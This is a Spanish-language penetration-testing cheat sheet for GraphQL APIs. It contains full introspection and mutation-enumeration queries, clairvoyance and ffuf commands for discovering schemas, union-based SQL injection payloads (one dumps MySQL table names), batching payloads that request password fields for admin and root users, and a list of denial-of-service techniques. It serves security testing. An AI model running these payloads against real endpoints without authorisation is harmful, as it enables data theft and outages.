GraphQL

Checklist

Consola de GraphQL expuesta (GraphQL development console).
Introspección habilitada (GraphQL introspection).

Versiones antiguas

query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {
        name
        description
        args {
          ...InputValue
        }
        onOperation
        onFragment
        onField
      }
    }
  }

  fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
      name
      description
      args {
        ...InputValue
      }
      type {
        ...TypeRef
      }
      isDeprecated
      deprecationReason
    }
    inputFields {
      ...InputValue
    }
    interfaces {
      ...TypeRef
    }
    enumValues(includeDeprecated: true) {
      name
      description
      isDeprecated
      deprecationReason
    }
    possibleTypes {
      ...TypeRef
    }
  }

  fragment InputValue on __InputValue {
    name
    description
    type { ...TypeRef }
    defaultValue
  }

  fragment TypeRef on __Type {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
        }
      }
    }
  }

Versiones modernas

query IntrospectionQuery {
      __schema {
        queryType { name }
        mutationType { name }
        subscriptionType { name }
        types {
          ...FullType
        }
        directives {
          name
          description
          
          locations
          args {
            ...InputValue
          }
        }
      }
    }

    fragment FullType on __Type {
      kind
      name
      description
      
      fields(includeDeprecated: true) {
        name
        description
        args {
          ...InputValue
        }
        type {
          ...TypeRef
        }
        isDeprecated
        deprecationReason
      }
      inputFields {
        ...InputValue
      }
      interfaces {
        ...TypeRef
      }
      enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
      }
      possibleTypes {
        ...TypeRef
      }
    }

    fragment InputValue on __InputValue {
      name
      description
      type { ...TypeRef }
      defaultValue
    }

    fragment TypeRef on __Type {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
                ofType {
                  kind
                  name
                  ofType {
                    kind
                    name
                  }
                }
              }
            }
          }
        }
      }
    }

Obtener mutaciones (mutations)

query {
  __schema {
    mutationType {
      name
      fields {
        name
        args {
          name
          defaultValue
          type {
            ...TypeRef
          }
        }
      }
    }
  }
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

Consultar campos (input fields) de un objeto

{   
  __type(name: "<object-name>") {
    name
    inputFields {
      name
      description
      defaultValue
    }
  }
}

Si la introspección esta deshabilitada utilizar sugerencias de campos (GraphQL suggestions) o realizar fuzzing.

# GraphQL suggestions
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress

# Fuzzing queries
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html

Depuración y divulgación de información (GraphQL error handling).
Búsqueda de IDOR (Insecure Direct Object Reference).
Manipular “mutaciones” (mutations), las cuales se utilizan para realizar acciones de modificación de los datos.
Ataques de inyección (Injection attacks).

# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}

Ataque por lotes (Batching attack).

# JSON list based batching
[
  {"query":"{user(username: \"user\") {id,name,password}}"},
  {"query":"{user(username: \"admin\") {id,name,password}}"},
  {"query":"{user(username: \"root\") {id,name,password}}"}
]

# Query name based batching
{"query":"{
  first: user(username:\"user\"){id,name,password}
  second: user(username:\"admin\") {id,name,password}
  third: user(username:\"root\") {id,name,password}
}"}

Ataque de denegación de servicio (Denial-of-Service DoS attacks).
- Batching attack.
- Circular reference (Deep recursion).
- Duplicación de campo (Field duplication).

Herramientas

Clairvoyance

https://github.com/nikitastupin/clairvoyance

clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress